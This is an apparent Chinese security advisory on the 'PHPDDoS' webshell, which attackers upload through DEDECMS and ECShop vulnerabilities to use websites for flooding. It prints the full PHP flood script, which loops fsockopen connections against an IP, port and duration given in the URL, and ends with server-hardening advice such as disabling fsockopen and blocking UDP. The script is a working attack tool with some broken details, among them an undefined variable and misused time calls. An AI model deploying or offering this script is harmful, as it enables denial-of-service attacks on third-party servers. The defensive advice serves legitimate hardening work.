近期，网络爆出PHPDOS攻击性木马，大量黑客寻找网站漏洞上传该类型木马形成肉鸡群对外进行UDP攻击，危险指数很高，影响范围很大。通常是利用DEDECMS会员和插件漏洞、ECshop漏洞及其他存在漏洞的网站程序上传该木马，无需获取管理员权限和服务器权限即可通过浏览器执行代码对外进行DDOS攻击，这种方式的肉鸡获取较为容易，因为目前市面上存在大量存在漏洞的网站，因而这种方式进行的DDOS攻击效果较好而成本极低，越来越盛行。以下是该木马的代码，仅供安全研究使用如用于非法用途后果自负：

1. <?php
2. ini_set("display_errors", "Off");
3. $packets = 0;
4. $ip = $_GET['ip'];
5. $port = $_GET['port'];
6. set_time_limit(0);
7. ignore_user_abort(FALSE);
8. $exec_time = $_GET['time'];
9. $timetime = time();
10. print "状态 : 正常运行中.....<br>";
11. $max_time = $time+$exec_time;
12. while(1){
13. $packets++;
14.         if(time() > $max_time){
15.                 break;
16.         }
17.         
18.         $fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0);       
19. }
20. echo "================================================<br>";
21. echo "  <font color=blue>www.phpddos.com<br>";
22. echo "  SYN Flood 模块<br>";
23. echo "  作者：ybhacker<br>";
24. echo "  警告：本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>";
25. echo "================================================<br><br>";
26. echo "  攻击包总数：<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>";
27. echo "  攻击总流量：<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>";
28. echo "  攻击总字节：<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>";
29. echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
30. ?>

 这明显是采用fsockopen 不断的发送TCP UDP 包，从而形成DDOS攻击。但局限于IIS程序池环境下，威力不是很明显，一般是出现IIS假死或死机，不会产生百G流量让整个机房都受影响！

为防止您的网站或服务器被上传此种木马对外攻击建议做以下的防护设置：

1、利用IPS安全策略组，禁止所有的UDP端口通信（注意：如果您是游戏或IM等需要UDP通信的服务器不能禁）

2、修改PHP.INI文件中的allow_url_fopen = Off 改成Off，同时去掉;extension=php_sockets.dll 前面的 ; 在disable_functions =中加上fsockopen。

3、限制IIS每个站点的带宽，并设置IIS进程池的内存使用量为80或定时收回进程池。

4、不用网上通用的cms系统，因为源码开放的，可能黑客早已经通读代码发觉出漏洞。往往官方封堵也不及时！真的要用也得删除不需要的组建，比如ECSHOP程序，一定要限制好缓存目录的权限，dedecms要限制图片后台缓存文件夹的权限，删除文件管理组件等。